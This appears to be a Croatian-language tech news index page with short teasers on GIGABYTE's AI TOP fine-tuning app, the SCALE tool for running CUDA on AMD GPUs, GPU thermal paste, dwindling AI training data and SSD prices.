Objavljeno prije 45 minuta

Lenovo ThinkPad kutak

Objavljeno prije 52 minute

Google Nexus/Pixel mobiteli

Novosti

GIGABYTE pokreće AI TOP aplikaciju za fino podešavanje AI modela

U kontekstu rastućeg zanimanja za generativnu umjetnu inteligenciju, GIGABYTE predstavlja ekskluzivnu AI TOP aplikaciju koja tvrtkama nudi lokalno osposobljavanje i optimizaciju umjetne inteligencije. Aplikacija nudi intuitivne tokove rada,... Pročitaj više

NVIDIA CUDA besprijekorno radi na AMD grafičkim procesorima pomoću alata SCALE

Britanski startup Spectral Compute nedavno je najavio lansiranje svog revolucionarnog GPGPU alata "SCALE", koji omogućuje CUDA programima NVIDIA-e da se izravno izvode na AMD GPU-ovima bez potrebe za prijenosom koda. Ova vijest predstavlja... Pročitaj više

Inferiorna termalna pasta krivac za visoku temperaturu grafičke kartice nakon dužeg vremena

Mnogi igrači su se suočili s problemom porasta temperature grafičke kartice (GPU) tijekom vremena, čak i nakon čišćenja prašine i održavanja sustava. Prema Igor's Labu, poznatoj web stranici recenzije hardvera, glavni krivac za ovaj problem... Pročitaj više

Svijetu nestaje podataka za obuku umjetne inteligencije

Tvorci sustava umjetne inteligencije (AI) godinama su se oslanjali na beskrajan izvor tekstova, slika i videozapisa s interneta za obuku svojih modela. No, ovaj izvor podataka polako nestaje. Studija koja je proučavala 14.000 internetskih d... Pročitaj više

Zašto cijene SSD-a i dalje rastu?

Solid-state pogoni (SSD-ovi) postali su dominantan izbor za pohranu podataka u tehnologijama poput IoT-a, računalstva u oblaku i umjetne inteligencije. SSD-ovi nadmašuju HDD-ove u brzini pristupa podacima, energetskoj učinkovitosti i pouzda... Pročitaj više

Sve novosti